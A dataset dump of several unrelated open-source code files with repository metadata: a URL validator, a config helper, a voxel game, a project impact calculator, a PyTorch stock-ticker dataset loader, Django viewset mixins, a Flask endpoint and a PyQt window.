"api_name": "flask.request.args",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "flask.re... |
72040607393 | """
This entire file is deprecated and will be deleted when MVC is working
"""
# import something for getting error codes
import validators
import re
import logging
logger = logging.getLogger(__name__) # now we use logger.debug, etc.
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter(style="{", fmt="{asctime} [{levelname}] {message}", datefmt="%d.%m.%Y %H:%M:%S")
file_handler = logging.FileHandler('url_validator.log')
file_handler.setFormatter(formatter)
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(formatter)
stream_handler.setLevel(logging.DEBUG)
logger.addHandler(file_handler)
logger.addHandler(stream_handler)
def url_is_valid(link):
    """Return True when *link* is a syntactically valid URL, else False.

    validators.url() returns True on success but a falsy
    ValidationFailure object on failure; coercing with bool() gives
    callers a plain boolean either way. This is backward compatible:
    truthiness is unchanged for every input.

    Example link for manual testing:
    https://www.youtube.com/watch?v=ehs6vQTFPoA
    """
    return bool(validators.url(link))
# link for testing purposes: https://www.youtube.com/watch?v=ehs6vQTFPoA
| fromCharCode/YouTube-Downloader | url_validator.py | url_validator.py | py | 1,000 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "logging.getLogger",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "logging.Formatter",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "logging.FileHa... |
22586754727 | import commentjson as json
import os
class Config:
    """Tiny JSON-backed configuration store.

    On construction, writes a default configuration to ``dictfile`` if
    the file does not exist yet.
    """

    def __init__(self, dictfile):
        self.dictfile = dictfile
        if not os.path.exists(self.dictfile):
            defaults = {
                "users": {
                    "testUser": "password"
                },
                "logfmt": "{%(name)s} %(levelname)s: %(message)s",
                "logLevel": "DEBUG"
            }
            with open(self.dictfile, 'w', encoding='utf-8') as handle:
                json.dump(defaults, handle, indent=4)

    def load(self) -> dict:
        """Read and return the configuration dictionary from disk."""
        with open(self.dictfile, 'r', encoding='utf-8') as handle:
            return json.load(handle)

    def dump(self, dictionary) -> None:
        """Write *dictionary* to disk, replacing the stored configuration."""
        with open(self.dictfile, 'w', encoding='utf-8') as handle:
            json.dump(dictionary, handle, indent=4)
| timoxa0/Reshala | server/configctl.py | configctl.py | py | 815 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "os.path.exists",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "commentjson.dump",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "commentjson.load",
"li... |
71442561313 | from ursina import *
from ursina.prefabs.first_person_controller import FirstPersonController
app = Ursina()
grass_texture = load_texture('assets/grass_block.png')
stone_texture = load_texture('assets/stone_block.png')
brick_texture = load_texture('assests/brick_block.png')
dirt_texture = load_texture('assets/dirt_block.png')
sky_texture = load_texture('assets/skybox.png')
arm_texture = load_texture('assets/arm_texture.png')
punch_sound=Audio('assets/punch_sound',loop=False, autoplay=False)
block_pick = 1 #<----creating a variable for creating blocks
def update():
    """Per-frame hook called by Ursina: animate the arm while a mouse
    button is held and read number keys 1-4 to select the block type."""
    global block_pick
    if held_keys['left mouse'] or held_keys['right mouse']:
        hand.active()
    else:
        hand.passive()
    # Number keys choose which texture new blocks get.
    if held_keys['1']: block_pick = 1
    if held_keys['2']: block_pick = 2
    if held_keys['3']: block_pick = 3
    if held_keys['4']: block_pick = 4
class Voxel(Button):  # creating a class containing cube methods
    """One placeable/destroyable block in the world. Being a Button
    gives it hover and click handling for free."""

    def __init__(self, position=(0, 0, 0), texture=grass_texture):
        super().__init__(
            parent=scene,
            position=position,
            model='assets/block',
            origin_y=0.5,
            texture=texture,
            # Slight random shade variation so adjacent blocks are distinguishable.
            color=color.color(0, 0, random.uniform(0.9, 1)),
            scale=0.5
        )

    def input(self, key):  # lets you create
        # Ursina forwards input events to every entity; only react when
        # the cursor is over this block.
        if self.hovered:
            if key == 'left mouse down':  # place a new block on the clicked face
                punch_sound.play()
                # block_pick (set in update()) selects the texture.
                if block_pick == 1: voxel = Voxel(position=self.position + mouse.normal, texture=grass_texture)
                if block_pick == 2: voxel = Voxel(position=self.position + mouse.normal, texture=stone_texture)
                if block_pick == 3: voxel = Voxel(position=self.position + mouse.normal, texture=brick_texture)
                if block_pick == 4: voxel = Voxel(position=self.position + mouse.normal, texture=dirt_texture)
            if key == 'right mouse down':  # destroy this block
                punch_sound.play()
                destroy(self)
class Sky(Entity):
    """Large double-sided textured sphere surrounding the scene, used
    as the skybox."""

    def __init__(self):
        settings = dict(
            parent=scene,
            model='sphere',
            texture=sky_texture,
            scale=150,
            double_sided=True,
        )
        super().__init__(**settings)
class Hand(Entity):
    """First-person arm overlay rendered on the UI layer."""

    def __init__(self):
        super().__init__(
            parent=camera.ui,
            model='assets/arm',
            texture=arm_texture,
            scale=0.2,
            rotation=Vec3(150, -10, 0),  # orient the arm in 3d space
            position=Vec2(0.4, -0.6),
        )

    def active(self):
        # Pull the arm in while a mouse button is held (punch pose).
        self.position = Vec2(0.3, -0.5)

    def passive(self):
        # BUG FIX: was `self.positiom` (typo), which only created a dead
        # attribute, so the arm never returned to its rest position.
        self.position = Vec2(0.4, -0.6)
def input(key):
    """Global key hook: pressing 'q' exits the game."""
    if key != "q":
        return
    quit()
# Build a flat 32x32 ground layer of voxels, then spawn the player, sky and
# arm overlay, and hand control to ursina's main loop.
for z in range(32): # loop for field parameters in the z direction
    for x in range(32): #loop for field parameters in the x direction
        voxel= Voxel(position=(x,0,z))
player=FirstPersonController() #allows us to move in game
sky= Sky()
hand= Hand()
app.run()
{
"api_name": "ursina.prefabs.first_person_controller.FirstPersonController",
"line_number": 90,
"usage_type": "call"
}
] |
17635193634 | from ..scrabTask import ReportTask
from utils import containedStructure
from datetime import datetime, timezone
from math import log2, pow
from dateutil import parser
name = "ImpactCalculator"
version = "1.1.1"
class ImpactData():
    """
    Helper class that stores all information about a single project that is
    needed to calculate the impact
    :param project_report: The project report
    :param language_weights: The language weights
    """
    def __init__(self, project_report, language_weights):
        self.__project_report = project_report
        self.__language_weights = language_weights
        # Result slots — they stay None when the report lacks the data,
        # which usable() checks before any impact is computed.
        self.authors = None
        self.contributors = None
        self.language_weight = None
        self.last_change_age = None
        self.project_age = None
        self.__gather_autor_contrib()
        self.__gather_project_dates()
        self.__gather_language_weight()
    def __gather_autor_contrib(self):
        """
        The function gathers the author and contributor amounts that are needed
        to calculate the impact of the project
        """
        report = None
        if 'AuthorContributorCounter' in self.__project_report:
            report = self.__project_report['AuthorContributorCounter']
        else:
            return
        # Both counters must be present; otherwise leave the slots as None.
        if 'author#' in report and 'contributor#' in report:
            self.authors = report['author#']
            self.contributors = report['contributor#']
    def __gather_project_dates(self):
        """
        The function gathers the first and last change dates that are needed to
        calculate the impact of the project
        """
        report = None
        if 'ProjectDates' in self.__project_report:
            report = self.__project_report['ProjectDates']
        else:
            return
        if 'first_change' in report and 'last_change' in report:
            # Ages are measured in whole days relative to "now" (UTC).
            self.project_age = (
                datetime.now(timezone.utc)
                - parser.parse(report['first_change'])
            ).days
            self.last_change_age = (
                datetime.now(timezone.utc)
                - parser.parse(report['last_change'])
            ).days
    def __gather_language_weight(self):
        """
        The function gathers the language that is needed to calculate the impact
        of the project. The function prefers the git hub information and will
        fall back to our own results generated by a more primitive algorithm
        """
        report = None
        if 'LanguageDetector' in self.__project_report:
            report = self.__project_report['LanguageDetector']
        # GitHub metadata (MetaDataCollector) overrides our own detector.
        if 'MetaDataCollector' in self.__project_report:
            if 'main_language' in self.__project_report['MetaDataCollector']:
                report = self.__project_report['MetaDataCollector']
        if not report:
            return
        # Only languages with a configured weight contribute to the impact.
        if ('main_language' in report and report[
                'main_language'] in self.__language_weights):
            self.language_weight = self.__language_weights[
                report['main_language']]
    def usable(self):
        """
        Checks weather all information is available to calculate the impact for
        the given project
        :returns: True if all necessary information is present False otherwise
        """
        return (self.authors is not None
                and self.contributors is not None
                and self.language_weight is not None
                and self.last_change_age is not None
                and self.project_age is not None)
class ImpactCalculator(ReportTask):
    """
    Class to calculate the impact for a single project
    Example:
        impact: 45.13200916761271
    :param parameter: Parameter given explicitly for this task, for all
                      projects, defined in the task.yaml
    :param global_args: Arguments that will be passed to all tasks. They
                        _might_ contain something that is useful for the task,
                        but the task has to check if it is _there_ as these
                        are user provided. If they are needed to work that
                        check should happen in the argHandler.
    """
    def __init__(self, parameter, global_args):
        super(ImpactCalculator, self).__init__(name, version, parameter,
                                               global_args)
        # Default weights; all of them may be overridden via tasks.yaml.
        self.__authors_weight = 1
        self.__contributors_weight = .1
        self.__last_change_age_weight = 1
        self.__project_age_weight = 1
        # FIXME think of real weights or generate them
        self.__language_weights = {
            'C++': 1,
            'C': 1,
            'Rust': 1,
            'Ruby': 1,
            'Java': 1,
            'Go': 1,
            'PHP': 1,
            'JavaScript': 1,
            'Objective-C': 1,
            'Swift': 1,
            'C#': 1,
            'Python': 1
        }
        self.__overwrite_weights()
    def __overwrite_weights(self):
        """
        Checks and overwrites the default weights with the ones provided in the
        tasks.yaml file
        """
        if 'authors_weight' in self._parameter:
            self.__authors_weight = self._parameter['authors_weight']
        if 'contributors_weight' in self._parameter:
            self.__contributors_weight = self._parameter['contributors_weight']
        if 'last_change_age_weight' in self._parameter:
            self.__last_change_age_weight = self._parameter[
                'last_change_age_weight']
        if 'project_age_weight' in self._parameter:
            self.__project_age_weight = self._parameter['project_age_weight']
        if 'language_weights' in self._parameter:
            # User-supplied language weights extend/override the defaults.
            self.__language_weights = {
                **self.__language_weights,
                **self._parameter['language_weights']
            }
    def calculate_impact(self, data):
        """
        Calculates the impact for the given project data
        :returns: The impact of the project, or None in case not all required
                  information is available in the given project report
        """
        if not data.usable():
            return None
        # Treat anything changed within the last quarter as "fresh".
        if data.last_change_age < 90:
            data.last_change_age = 90
        # Each term saturates towards 10 as its statistic grows; the language
        # weight scales the whole score.
        return data.language_weight * (
            (10 - pow(2, log2(10)
                      - self.__contributors_weight * data.contributors))
            + (10 - pow(2, log2(10)
                        - self.__authors_weight * data.authors))
            + self.__last_change_age_weight * (
                10 / pow(2, ((data.last_change_age / 90) - 1)))
            + (10 - pow(2, log2(10)
                        - self.__project_age_weight * data.project_age
                        / 365))
        )
    def scrab(self, report):
        """
        The scrab task calculates for all projects in the report the impact.
        :param report: The report to analyse _and_ change
        :returns: Report that contains all scrabbed information
        Example:
            impact: 45.13200916761271
        """
        # Pre-set so the error message below can always name the project, even
        # when the failure happens before the first loop iteration.
        project = None
        try:
            for project in report['projects']:
                impact_data = ImpactData(report['projects'][project],
                                         self.__language_weights)
                impact = self.calculate_impact(impact_data)
                # BUG FIX: `if impact:` silently discarded a legitimate
                # impact of exactly 0.0; test against None instead.
                if impact is not None:
                    report['projects'][project]['impact'] = float(
                        "{0:.2f}".format(impact))
                elif not containedStructure(
                        {'projects': {project: {'impact': 0}}}, report):
                    report['projects'][project]['impact'] = None
        except Exception as e:
            # BUG FIX: previously referenced self.__projects, an attribute
            # that never existed, so every failure surfaced as an
            # AttributeError instead of this message.
            raise Exception(
                "While calculating the impact for the project '{}' with "
                "the report\n{}".format(
                    project,
                    report.get('projects', {}).get(project))
            ) from e
        return report
| Eyenseo/gitScrabber | gitScrabber/scrabTasks/report/impactCalculator.py | impactCalculator.py | py | 8,015 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "datetime.datetime.now",
"line_number": 66,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 66,
"usage_type": "name"
},
{
"api_name": "datetime.timezone.utc",
"line_number": 66,
"usage_type": "attribute"
},
{
"api_name": "da... |
74768151392 | import pygame
import random
import math
from constants import *
class Paddle:
    """Common state and rendering shared by both paddles."""

    def __init__(self, x_pos, width, height, speed, color):
        # Start vertically centered at the given horizontal position.
        start_y = (SCREEN_HEIGHT - height) / 2
        self.rect = pygame.Rect((x_pos, start_y), (width, height))
        self.color = color
        self.speed = speed
        self.velocity = pygame.math.Vector2(0, 1)  # unit vector pointing down
        self.score = 0

    def update(self, delta):
        """Movement is defined by subclasses."""
        pass

    def render(self, screen):
        pygame.draw.rect(screen, self.color, self.rect)
class Player(Paddle):
    """Human-controlled paddle (arrow keys or W/S)."""

    def __init__(self, x_pos, width, height, color):
        super().__init__(x_pos, width, height, 500, color)

    def update(self, delta):
        pressed = pygame.key.get_pressed()
        step = self.velocity * self.speed * delta
        if pressed[pygame.K_DOWN] or pressed[pygame.K_s]:
            self.rect.move_ip(step)
        elif pressed[pygame.K_UP] or pressed[pygame.K_w]:
            self.rect.move_ip(-step)
        # Clamp the y value so the paddle stays fully on screen.
        self.rect.y = max(0, min(self.rect.y, SCREEN_HEIGHT - self.rect.height))

    def update_score(self, font):
        """Increment the score and pre-render its text surface."""
        self.score += 1
        self.text_score = font.render(str(self.score), True, (255, 0, 0))
class Enemy(Paddle):
    """AI paddle: precomputes where the ball will cross its x position."""
    def __init__(self, x_pos, width, height, color):
        super().__init__(x_pos, width, height, 500, color)
        # Where the paddle has to move in the y axis
        self.predicted_y = (SCREEN_HEIGHT - height) / 2
        # The place where the ball collides with the paddle
        self.hit_location = 0
    def update(self, delta):
        # Move toward the predicted intercept, offset by the chosen hit point.
        if self.predicted_y - self.hit_location < self.rect.y:
            self.rect.move_ip(-self.velocity * self.speed * delta)
        if self.predicted_y - self.hit_location > self.rect.y:
            self.rect.move_ip(self.velocity * self.speed * delta)
    def calculate_next_position(self, ball):
        # Simulate the ball's straight-line flight, reflecting off the top and
        # bottom walls, until its path passes the paddle's x coordinate.
        vx, vy = ball.velocity
        cx, cy = ball.rect.topright
        collision_x = 0
        while collision_x < self.rect.x:
            # Next wall the ball will hit (top when moving up, bottom otherwise).
            target_y = 0 if vy < 0 else SCREEN_HEIGHT - ball.radius * 2
            collision_x = cx + vx * (target_y - cy) / vy
            cx, cy = collision_x, target_y
            vy *= -1
        # Interpolate from the (virtual) last wall point back to the paddle's
        # x plane; vy was just flipped in the loop, hence the subtraction.
        self.predicted_y = cy - vy * (self.rect.x - cx) / vx
        # Aim a random point on the paddle at the ball to vary return angles.
        self.hit_location = random.randint(10, self.rect.height - 10)
class Ball:
    """The pong ball: keeps a float position and syncs it into an int rect."""

    def __init__(self, radius, speed):
        # BUG FIX: random.randint requires integer bounds; SCREEN_HEIGHT / 4
        # is a float and raises on modern Python. Use floor division.
        appear_y = random.randint(SCREEN_HEIGHT // 4, SCREEN_HEIGHT * 3 // 4)
        self.rect = pygame.Rect(SCREEN_WIDTH / 2 - radius, appear_y - radius,
                                radius * 2, radius * 2)
        # NOTE(review): position starts at the vertical center even though the
        # rect starts at appear_y; the first update() re-syncs rect to position.
        self.position = pygame.math.Vector2(SCREEN_WIDTH / 2 - radius, SCREEN_HEIGHT / 2 - radius)
        self.radius = radius
        self.speed = speed
        # Random launch angle in [-45 deg, 45 deg], sent towards the left side.
        angle = random.uniform(-math.pi / 4, math.pi / 4)
        self.velocity = pygame.math.Vector2(math.cos(angle) * -1, -math.sin(angle))

    def update(self, delta):
        self.position += self.velocity * self.speed * delta
        self.update_position()
        # Bounce off the top and bottom walls.
        # NOTE(review): only rect.y is clamped here, not position.y, so the
        # float position can briefly run past the wall — confirm intended.
        if self.rect.y < 0:
            self.rect.y = 0
            self.velocity.y *= -1
        elif self.rect.y > SCREEN_HEIGHT - self.radius * 2:
            self.rect.y = SCREEN_HEIGHT - self.radius * 2
            self.velocity.y *= -1

    def render(self, screen):
        pygame.draw.rect(screen, BALL_COLOR, self.rect)

    def reset(self, direction=-1):
        """Prepares the ball for a new match."""
        # Put the ball in the middle (x) at a random height (y).
        self.position.x = SCREEN_WIDTH / 2 - self.radius
        # BUG FIX: same float-bounds problem as in __init__.
        self.position.y = random.randint(SCREEN_HEIGHT // 4, SCREEN_HEIGHT * 3 // 4) - self.radius
        self.update_position()
        # Set the launch angle; `direction` picks which player is served.
        angle = random.uniform(-math.pi / 4, math.pi / 4)
        self.velocity.x = math.cos(angle) * direction
        self.velocity.y = -math.sin(angle)

    def change_angle(self, hit_position, height):
        """Changes the velocity angle depending on the paddle part hit."""
        angle = math.pi / 2 * hit_position / height - math.pi / 4
        self.velocity.x = math.cos(angle)
        self.velocity.y = math.sin(angle)
        # Avoid a perfectly horizontal bounce that could never be returned.
        if self.velocity.y == 0:
            self.velocity.y = math.sin(angle + 0.02)

    def update_position(self):
        # Copy the float position into the (integer) rect used for collisions.
        self.rect.x = self.position.x
        self.rect.y = self.position.y
| delhoyo31415/Pygame-Ping-Pong | entities.py | entities.py | py | 4,472 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "pygame.Rect",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "pygame.math.Vector2",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "pygame.math",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "pygame.draw.rect",
... |
70975829473 |
import torch
def cosine_metric(novels, bases):
    """
    Pairwise cosine similarity between query vectors and prototypes.
    Args:
        novels (tensor): [n, dim] query embeddings
        bases (tensor): appears to expect [dim, m] (prototypes stored
            column-wise, note the transpose below) -- TODO confirm callers
    Returns:
        tensor: [n, m] similarity scores
    """
    n, m = novels.shape[0], bases.shape[1]
    expanded_novels = novels.unsqueeze(1).expand(n, m, -1)
    expanded_bases = bases.transpose(1, 0).unsqueeze(0).expand(n, m, -1)
    assert expanded_novels.size() == expanded_bases.size()
    similarity = torch.nn.CosineSimilarity(dim=-1, eps=1e-6)
    return similarity(expanded_bases, expanded_novels)
def euclidean_dis(a, b):
    """
    Pairwise euclidean distance between two batches of row vectors.
    Args:
        a (tensor): [n, dim]
        b (tensor): [m, dim]
    Returns:
        tensor: [n, m] distance matrix
    """
    n, m = a.shape[0], b.shape[0]
    left = a.unsqueeze(1).expand(n, m, -1)
    right = b.unsqueeze(0).expand(n, m, -1)
    # No clamp before sqrt (a clamped variant was tried and commented out
    # in the original); kept identical.
    return (left - right).pow(2).sum(dim=2).sqrt()
def euclidean_metric(a, b):
    """
    Negative squared euclidean distance, used directly as class logits.
    Args:
        a (tensor): [n, dim] query features
        b (tensor): appears to expect [dim, m] (prototypes stored
            column-wise, note the transpose below) -- TODO confirm callers
    Returns:
        tensor: [n, m] logits; larger means more similar
    """
    n, m = a.shape[0], b.shape[1]
    queries = a.unsqueeze(1).expand(n, m, -1)
    prototypes = b.transpose(1, 0).unsqueeze(0).expand(n, m, -1)
    print(queries.shape, prototypes.shape)
    # The distances are only compared / softmax-ed, so the sqrt is skipped;
    # negate because a larger logit must mean a smaller distance.
    return -((queries - prototypes) ** 2).sum(dim=2)
{
"api_name": "torch.nn.CosineSimilarity",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 22,
"usage_type": "attribute"
},
{
"api_name": "torch.pow",
"line_number": 34,
"usage_type": "call"
}
] |
70071534753 | from core import services
from django.http import HttpResponse
from openpyxl.writer.excel import save_virtual_workbook
from rest_framework import viewsets
from rest_framework.decorators import action
from rest_framework.response import Response
class DetailedListViewSetMixin(viewsets.ModelViewSet):
    # Maps DRF action name -> serializer class; see get_serializer_class().
    serializer_action_classes = {}
    ordering = ('id',)
    def get_serializer_class(self):
        """
        A class which inhertis this mixins should have variable
        `serializer_action_classes`.
        Look for serializer class in self.serializer_action_classes, which
        should be a dict mapping action name (key) to serializer class (value),
        i.e.:
        class SampleViewSet(viewsets.ViewSet):
            serializer_class = DocumentSerializer
            serializer_action_classes = {
               'upload': UploadDocumentSerializer,
               'download': DownloadDocumentSerializer,
            }
            @action
            def upload:
                ...
        If there's no entry for that action then just fallback to the regular
        get_serializer_class lookup: self.serializer_class, DefaultSerializer.
        """
        try:
            return self.serializer_action_classes[self.action]
        except (KeyError, AttributeError):
            return super().get_serializer_class()
    @action(detail=False, methods=['get'])
    def detailed_list(self, request, *args, **kwargs):
        # GET /detailed_list/: paginated list rendered with the per-action
        # ("detailed") serializer instead of the default one.
        queryset = self.filter_queryset(self.get_queryset())
        page = self.paginate_queryset(queryset)
        kwargs.update({'many': True, 'context': {'request': self.request}})
        if page is not None:
            serializer = self.get_serializer_class()(page, **kwargs)
            return self.get_paginated_response(serializer.data)
        # Pagination disabled: serialize the whole queryset in one response.
        serializer = self.get_serializer_class()(queryset, **kwargs)
        return Response(serializer.data)
    @action(detail=True, methods=['get'])
    def detailed(self, request, *args, **kwargs):
        # GET /<pk>/detailed/: single object via the per-action serializer.
        instance = self.get_object()
        kwargs.pop('pk')
        kwargs.update({'context': {'request': self.request}})
        serializer = self.get_serializer_class()(instance, **kwargs)
        return Response(serializer.data)
class ExportViewSetMixin(viewsets.ModelViewSet):
    # Adds GET /export/?excel_type=csv|xlsx streaming the filtered queryset.
    @action(detail=False, methods=["get"])
    def export(self, request, *args, **kwargs):
        excel_type = request.GET.get('excel_type', 'csv')
        qs = self.filter_queryset(self.get_queryset())
        serializer_class = self.get_serializer_class()
        service = services.ExcelExportService(
            queryset=qs, serializer_class=serializer_class,
        )
        if excel_type == 'xlsx':
            wb = service.create_workbook()
            # NOTE(review): `filename` is computed but the header below
            # hard-codes "(unknown)" — this looks like it should interpolate
            # {filename}; confirm against the original intent.
            filename = service.generate_file_name('xlsx')
            # NOTE(review): save_virtual_workbook is deprecated in newer
            # openpyxl releases; consider wb.save(BytesIO()) instead.
            response = HttpResponse(
                save_virtual_workbook(wb), content_type="application/vnd.ms-excel"
            )
            response["Content-Disposition"] = f'attachment; filename="(unknown)"'
        else: # csv
            response = service.create_csv(True)
        return response
| berkaymizrak/Immfly-Media-Platform-Project | core/mixins.py | mixins.py | py | 3,096 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "rest_framework.viewsets.ModelViewSet",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "rest_framework.viewsets",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "rest_framework.response.Response",
"line_number": 48,
"usage_type": "call... |
27051971804 | from dtat.api.guild import guildprint
from dtat.services.list import guildWithId
from dtat.services.update import guildObj
from flask import jsonify
from dtat.models import Player
from dtat.services.remove import removeGuild
from dtat.exceptions import DTATException
@guildprint.route('/id/<int:id>/data', methods=['GET'])
def data(id):
    """
    Returns guild data, refreshing the guild first when no players are cached.
    :param id: guild_id
    """
    guild = guildWithId(id)
    if not guild.players:
        try:
            guild = guildObj(guild, True, True)['guild']
        except DTATException as e:
            if e.invalid == ["Invalid guild id"]:
                # The guild no longer exists upstream: drop it locally too.
                removeGuild(guild)
                raise DTATException(410, "Guild has been deleted.", ["guild"])
            raise DTATException(e.errorCode, e.message, e.invalid)
    player_rows = [player.list() for player in guild.players]
    return jsonify({
        'id': guild.id,
        'name': guild.name,
        'level': guild.level,
        'players': {
            'keys': Player.keys(),
            'data': player_rows
        }
    })
| deeptownadmintools/main-server | dtat/api/guild/data.py | data.py | py | 1,139 | python | en | code | 3 | github-code | 1 | [
{
"api_name": "dtat.services.list.guildWithId",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "dtat.services.update.guildObj",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "dtat.exceptions.DTATException",
"line_number": 20,
"usage_type": "name"
},... |
38326493487 | import torch
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from torch.utils.data import Dataset, DataLoader
import glob
from pathlib import Path
import os
class TickerDataset(Dataset):
    # PyTorch Dataset over per-ticker price CSVs; each item is a returns
    # (sub-)series of length `series_length` plus its dates and filename.
    def __init__(self, root_dir, series_length, lookback, min_sequence_length, template='*.csv', transform=None,
                 start_date=None, end_date=None, fixed_start_date=False, datetime_format='%Y-%m-%d',
                 normalised_returns=False, max_n_files=None):
        self.series_length = series_length
        self.lookback = lookback
        self.transform = transform
        self.start_date = start_date
        self.end_date = end_date
        self.datetime_format = datetime_format
        self.fixed_start_date = fixed_start_date
        self.normalised_returns = normalised_returns
        # Only keep tickers with length less than a minimum.
        ticker_files = glob.glob(str(Path(root_dir) / template))
        if max_n_files:
            ticker_files = ticker_files[:max_n_files]
        self.ticker_files = []
        print(f'Finding tickers with sufficient length, from {len(ticker_files)} files.')
        for ticker_file in ticker_files:
            if 0:
                # Disabled debugging filter (single-ticker run).
                if os.path.basename(ticker_file) != 'MS_prices.csv':
                    continue
            df = read_csv(ticker_file, self.datetime_format)
            # Identify the indices within the given date range.
            if start_date and end_date:
                valid_indices = ((df.index >= start_date) & (df.index <= end_date))
            elif start_date:
                valid_indices = df.index >= start_date
            elif end_date:
                valid_indices = df.index <= end_date
            else:
                # NOTE(review): constructing without start_date/end_date always
                # trips this assert — the dates are effectively required.
                assert False
            if sum(valid_indices) == 0:
                # No days in the given date range.
                continue
            # Get the indicies of the valid days in the date range.
            valid_indices = np.where(valid_indices)[0]
            if valid_indices[0] < lookback:
                # Not enough days before the start date to compute returns.
                continue
            if len(valid_indices) < series_length:
                # Not enough days between the start and end date.
                continue
            self.ticker_files.append(ticker_file)
            continue
            # NOTE(review): everything below in this loop body is unreachable
            # (the `continue` above always fires) — left-over from an older
            # implementation; candidate for removal.
            # start_date_index = np.
            # Get the index of the start date.
            start_date_row = df.index.get_loc(self.start_date)
            if self.start_date:
                df = df.loc[self.start_date:]
            if self.end_date:
                df = df.loc[:self.end_date]
            if df.shape[0] >= min_sequence_length:
                self.ticker_files.append(ticker_file)
        print(f'Found {len(self.ticker_files)} files.')
    def __len__(self):
        return len(self.ticker_files)
    def __getitem__(self, idx):
        if torch.is_tensor(idx):
            idx = idx.tolist()
        filename = self.ticker_files[idx]
        df = read_csv(filename, self.datetime_format)
        # Calculate a rolling z-score.
        df['returns'] = df['close'].pct_change()
        if self.normalised_returns:
            # Normalised returns.
            df['returns'] = (df['returns'] - df['returns'].rolling(self.lookback).mean()) / df['returns'].rolling(self.lookback).std()
        if 0:
            # Return close prices.
            df['returns'] = df['close']
        df = df.dropna()
        # Filter dates *after* calculating returns, so previous dates can be used in the lookback.
        if self.start_date:
            df = df.loc[self.start_date:]
        if self.end_date:
            df = df.loc[:self.end_date]
        returns = np.array(df['returns'])
        if self.fixed_start_date:
            # Get a series at the start date.
            start = 0
        else:
            # Get a random sub-series.
            start = np.random.randint(0, returns.shape[0] - self.series_length)
        series = returns[start: start + self.series_length]
        # Add extra feature dimension.
        series = series[..., np.newaxis]
        # Convert to torch tensor.
        series = torch.from_numpy(series)
        dates = df.index.values[start: start + self.series_length]
        dates = [str(d) for d in dates]
        sample = {
            'series': series,
            'filename': filename,
            'dates': dates,
        }
        return sample
def read_csv(filename, datetime_format):
    """Load a ticker CSV and index it by its parsed 'date' column."""
    frame = pd.read_csv(filename)
    frame['date'] = pd.to_datetime(frame['date'], format=datetime_format)
    frame.set_index('date', inplace=True)
    return frame
def create_ticker_dataset(root_dir, series_length, lookback, min_sequence_length,
                          start_date=None, end_date=None, fixed_start_date=False,
                          normalised_returns=False, max_n_files=None):
    """Convenience factory that forwards all arguments to TickerDataset."""
    return TickerDataset(
        root_dir,
        series_length,
        lookback,
        min_sequence_length,
        start_date=start_date,
        end_date=end_date,
        fixed_start_date=fixed_start_date,
        normalised_returns=normalised_returns,
        max_n_files=max_n_files,
    )
def test_ticker_dataset():
    # Smoke-test: build the dataset from a local (hard-coded, Windows-only)
    # directory and iterate a few batches, printing their shapes.
    root_dir = r'D:\projects\trading\mlbootcamp\tickers'
    series_length = 200
    lookback = 200
    min_sequence_length = 2 * (series_length + lookback)
    max_n_files = 100
    dataset = create_ticker_dataset(root_dir, series_length, lookback, min_sequence_length, max_n_files=max_n_files)
    dataloader = DataLoader(dataset, batch_size=4, shuffle=True, num_workers=0)
    for b, batch in enumerate(dataloader):
        series = batch['series']
        filename = batch['filename']
        dates = batch['dates']
        print(b, series.shape, filename, dates)
def main():
    # Ad-hoc exploration: plot the rolling z-score of AAPL returns from a
    # hard-coded local CSV (not used by test_ticker_dataset below).
    df = pd.read_csv(r'D:\projects\trading\mlbootcamp\tickers\AAPL_prices.csv')
    # Calculate a rolling z-score.
    lookback = 200
    df['returns'] = df['close'].pct_change()
    df['returns'] = (df['returns'] - df['returns'].rolling(lookback).mean()) / df['returns'].rolling(lookback).std()
    fig, axes = plt.subplots(1, 1, squeeze=False)
    ax = axes[0, 0]
    # ax.plot(df['date'], df['close'])
    # df['close'].plot()
    df['returns'].plot()
    # df['mean'].plot()
    plt.show()
    print(df.info())
if __name__ == '__main__':
    test_ticker_dataset()
    # main()
| pwmorrison/trading | mlbootcamp/vae/dataset.py | dataset.py | py | 6,419 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "torch.utils.data.Dataset",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "glob.glob",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "pathlib.Path",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "os.path.basename",
... |
6345239505 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2017/3/3 16:31
# @Author : Vincent.G.Woo
# @Site :
# @File : blogtest2.py
# @Software: PyCharm Community Edition
# @Python_Version:
# @Software_Version:
import sys
from blog import Ui_MainWindow
from PyQt5 import QtWidgets
class mywindow(QtWidgets.QWidget, Ui_MainWindow):
    """Main window: copies HTML from the text edit into the text browser."""

    def __init__(self):
        super(mywindow, self).__init__()
        self.setupUi(self)
        # BUG FIX: the text was previously kept in a module global (with a
        # no-op class-level `global mStr` statement); calling setText before
        # getText raised NameError. An instance attribute avoids both issues.
        self._current_text = ""
        self.pushButton_3.clicked.connect(self.addText)

    def getText(self):
        """Capture the current contents of the edit box as HTML."""
        self._current_text = self.textEdit.toHtml()

    def setText(self):
        """Append the captured text to the browser pane."""
        self.textBrowser.append(self._current_text)
